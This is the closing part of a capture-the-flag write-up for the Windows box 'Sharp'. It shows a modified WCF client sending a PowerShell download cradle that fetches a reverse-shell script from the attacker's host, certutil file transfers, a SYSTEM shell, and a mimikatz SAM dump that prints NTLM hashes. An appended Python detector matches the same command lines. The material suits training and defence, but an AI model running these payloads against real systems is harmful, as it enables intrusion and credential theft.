<span class="token punctuation">}</span></span></span></span></code></pre></li><li id="https://www.notion.so/285ed5c89179417587a206e513ced637" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">This means we can execute arbitrary code with privileged access. Under </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Program.cs</code></span><span class="SemanticString"> of the client, add the following reverse shell payload:</span></span><pre id="https://www.notion.so/7cafa223723746378e024a10bf665109" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Console<span class="token punctuation">.</span><span class="token function">WriteLine</span><span class="token punctuation">(</span>client<span class="token punctuation">.</span><span class="token function">InvokePowerShell</span><span class="token punctuation">(</span>"IEX <span class="token punctuation">(</span><span class="token keyword">new</span><span class="token operator">-</span><span class="token keyword">object</span> net<span class="token punctuation">.</span>webclient<span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">downloadstring</span><span class="token punctuation">(</span>'</span></span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://10.10.14.26/Invoke-PowerShellTcp.ps1"><span>http<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span><span class="token number">10.10</span><span class="token number">.14</span><span class="token number">.26</span><span class="token operator">/</span>Invoke<span class="token operator">-</span>PowerShellTcp<span class="token punctuation">.</span>ps1</span></a></span><span class="SemanticString"><span>'<span class="token punctuation">)</span>"<span class="token 
punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span></span></span></span></code></pre></li><li id="https://www.notion.so/213425a77471401fa488c70bab217a81" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Build the application and copy both </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">WcfClient.exe</code></span><span class="SemanticString"> and </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">WcfRemotingLibrary.dll</code></span><span class="SemanticString"> to the HTTP server.</span></span></li><li id="https://www.notion.so/4b668e5458d34cee8aad7fe0fd173456" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Since we are using the same reverse shell script, we will also need to change the reverse connection's port under </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Invoke-PowerShellTcp.ps1</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/f028b29ed4954d7d9ad323a5d772afa6" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token function">Invoke-PowerShellTcp</span> <span class="token operator">-</span>Reverse <span class="token operator">-</span>IPAddress 10<span class="token punctuation">.</span>10<span class="token punctuation">.</span>14<span class="token punctuation">.</span>26 <span class="token operator">-</span>Port 4204</span></span></span></code></pre></li><li id="https://www.notion.so/243c542e63564ffe81ce32ecc4658a93" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Listen for a reverse connection on port 4204:</span></span><div id="https://www.notion.so/1ddbd848673240839bc4f2e6d240f10c" class="ColorfulBlock 
ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> .\nc64.exe -lvnp 4204</code></span></span></p></div></li><li id="https://www.notion.so/ce7438fb907a4680b66a48280934fdb2" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Changing the endpoint address from localhost to 10.10.10.219 did not connect; the server likely listens on localhost only.</span></span></li><li id="https://www.notion.so/56c7270fc4bb470e817bd72c2a202984" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">This means we need to upload the modified client and library back onto the machine and run them locally there.</span></span></li><li id="https://www.notion.so/a4bbec5a2aff4c38b305d0c435e3a7b9" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Direct copy to the SMB share failed, so we transfer the modified files with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">certutil</code></span><span class="SemanticString"> instead:</span></span><div id="https://www.notion.so/18ff908113034a828b2b8ff5de408e8c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> certutil -urlcache -split -f "http://10.10.14.26/WcfClient.exe" WcfClient.exe</code></span></span></p></div><div id="https://www.notion.so/0c7aee2b20f745039c1a4c6924d93608" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> certutil -urlcache -split -f "http://10.10.14.26/WcfRemotingLibrary.dll" 
WcfRemotingLibrary.dll</code></span></span></p></div></li><li id="https://www.notion.so/c984539b36e147d4bc440703d0c16780" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Execute </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">WcfClient.exe</code></span><span class="SemanticString">, and we get a reverse shell on port 4204 as system:</span></span><div id="https://www.notion.so/b95be1df14ec46b88bac6748010903ee" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> whoami /all</code></span></span></p></div><pre id="https://www.notion.so/e256a6c0dbd14231be1e95cbacccf40c" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>USER INFORMATION
----------------
User Name SID
=================== ========
nt authority\system S-1-5-18
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
BUILTIN\Administrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
Mandatory Label\System Mandatory Level Label S-1-16-16384</span></span></span></code></pre></li><li id="https://www.notion.so/cddaa8fd086749ea8d56887d2f341b90" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Shell seems to be unstable and collapses after a minute, as </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">WcfClient.exe</code></span><span class="SemanticString"> kills the connection on timeout.</span></span></li><li id="https://www.notion.so/a9d92cc1a975470ea7d677670103046e" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Get root flag!</span></span></li></ul><h2 id="https://www.notion.so/0393109d04974f919a011295e20e644c" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/0393109d04974f919a011295e20e644c"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Persistence</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/9fa90fc04b38423890e698135cb63438" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Get NTLM hash with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">mimikatz</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/21a5589aad3140a483424af2b0c9f4c2" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span 
class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> ./mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"</code></span></span></p></div><pre id="https://www.notion.so/7609df2cbe4946199897982a69bc6bd2" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
560 {0;000003e7} 1 D 34701 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;000003e7} 0 D 1597101 NT AUTHORITY\SYSTEM S-1-5-18 (04g,28p) Primary
* Thread Token : {0;000003e7} 1 D 1617230 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # lsadump::sam
Domain : SHARP
SysKey : 16d3cbceb100e487ba2614447fede88d
Local SID : S-1-5-21-294878639-2649470188-886412631
SAMKey : 058e78fa26734778bb823e660e3b0c25
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 9e2ede4a0c81d4ca7630ef1e8d30afb7
RID : 000003ee (1006)
User : debug
Hash NTLM: 6c7d1f972008d581e788e7c24585d2bf
RID : 000003ef (1007)
User : lars
Hash NTLM: e5852e8163e71de86599596375a22e5c</span></span></span></code></pre></li></ul><h2 id="https://www.notion.so/8aa4251f9c984d5083710ad81cd8a2c8" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/8aa4251f9c984d5083710ad81cd8a2c8"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Resources</span></span></h2><ol class="NumberedListWrapper"><li id="https://www.notion.so/bca526b45e914bd7a65e4d392f3edd90" class="NumberedList" value="1"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://infinitelogins.com/2020/06/17/enumerating-smb-for-pentesting/">https://infinitelogins.com/2020/06/17/enumerating-smb-for-pentesting/</a></span></span></li><li id="https://www.notion.so/4e0ec89d020d474eb90dafebcb225a83" class="NumberedList" value="2"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec-cheatsheet/">https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec-cheatsheet/</a></span></span></li><li id="https://www.notion.so/e0e84bcd509a45479c6873fe7272e147" class="NumberedList" value="3"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" 
href="https://github.com/tyranid/ExploitRemotingService">https://github.com/tyranid/ExploitRemotingService</a></span></span></li></ol></article>
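<p>Added detection example (not part of the original writeup): the <code>certutil -urlcache</code> download, the <code>IEX (new-object net.webclient).downloadstring(...)</code> cradle run through the modified WCF client, and the <code>mimikatz</code> SAM dump from the privilege escalation and persistence steps above all leave distinctive process command lines. The Python below applies three command-line rules to constructed process-creation records in a simplified <code>key=value; key=value</code> format. The log lines, the field names and the parent/child process relationships in them are assumptions made for the example, not observations from the box.</p>

```python
"""Command-line detection rules for the tradecraft shown in this writeup
(certutil download, PowerShell download cradle, mimikatz SAM dump), applied
to constructed process-creation records. Added example, not the writeup's code."""
import re
from typing import Dict, List, Tuple

# Each rule: (name, regex applied to the full command line).
RULES: List[Tuple[str, re.Pattern]] = [
    # certutil used as a downloader: -urlcache together with an http(s) URL
    ("certutil_download",
     re.compile(r"certutil(\.exe)?\s+.*-urlcache\b.*https?://", re.I)),
    # IEX + Net.WebClient download cradle, as sent via the WCF client above
    ("powershell_download_cradle",
     re.compile(r"\bIEX\b.*new-object\s+net\.webclient.*downloadstring", re.I)),
    # mimikatz module names passed on the command line
    ("mimikatz_modules",
     re.compile(r"(privilege::debug|token::elevate|lsadump::sam|sekurlsa::)", re.I)),
]

# Constructed sample records (hypothetical format and process tree); the
# command lines mirror those in the writeup, the benign lines are controls.
SAMPLE_LOG = """\
Time=12:01:03; User=SHARP\\lars; ParentImage=C:\\Windows\\explorer.exe; Image=C:\\Windows\\System32\\certutil.exe; CommandLine=certutil -urlcache -split -f "http://10.10.14.26/WcfClient.exe" WcfClient.exe
Time=12:01:09; User=SHARP\\lars; ParentImage=C:\\Windows\\explorer.exe; Image=C:\\Windows\\System32\\certutil.exe; CommandLine=certutil -verify cert.cer
Time=12:02:41; User=NT AUTHORITY\\SYSTEM; ParentImage=C:\\temp\\WcfClient.exe; Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe; CommandLine=powershell -c "IEX (new-object net.webclient).downloadstring('http://10.10.14.26/Invoke-PowerShellTcp.ps1')"
Time=12:05:12; User=NT AUTHORITY\\SYSTEM; ParentImage=C:\\Windows\\System32\\cmd.exe; Image=C:\\temp\\mimikatz.exe; CommandLine=./mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"
Time=12:06:00; User=SHARP\\lars; ParentImage=C:\\Windows\\explorer.exe; Image=C:\\Windows\\System32\\notepad.exe; CommandLine=notepad.exe notes.txt
"""

# A field value runs until the next "; Key=" separator or the end of the line,
# so '=' characters inside a value (e.g. in a command line) are preserved.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=; \w+=|$)")


def parse_line(line: str) -> Dict[str, str]:
    """Split one 'Key=value; Key=value' record into a dict."""
    return {k: v for k, v in FIELD_RE.findall(line)}


def detect(log_text: str) -> List[Dict[str, str]]:
    """Return one hit per (record, rule) with the context a responder needs."""
    hits = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ev = parse_line(raw)
        cmd = ev.get("CommandLine", "")
        for name, pattern in RULES:
            if pattern.search(cmd):
                hits.append({"rule": name,
                             "time": ev.get("Time", "?"),
                             "user": ev.get("User", "?"),
                             "parent": ev.get("ParentImage", "?"),
                             "command": cmd})
    return hits


def summarize(hits: List[Dict[str, str]]) -> Dict[str, int]:
    """Count hits per rule for a quick triage view."""
    counts: Dict[str, int] = {}
    for h in hits:
        counts[h["rule"]] = counts.get(h["rule"], 0) + 1
    return counts


if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for h in found:
        print(f"[{h['rule']}] {h['time']} {h['user']} parent={h['parent']} :: {h['command']}")
    print(summarize(found))
```

<p>The parent image is carried through on purpose: a download cradle whose parent is the WCF client process running as SYSTEM is a much stronger signal than the same string under a user's shell, and the benign <code>certutil -verify</code> line shows why the rule keys on <code>-urlcache</code> plus a URL rather than on the binary name alone.</p>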
<footer class="Footer">
<div>samiko@127.0.0.1~$</div>
<div>·</div>
<div>Powered by <a href="https://github.com/dragonman225/notablog" target="_blank" rel="noopener noreferrer">Notablog</a>.</div>
</footer>
</body>
</html>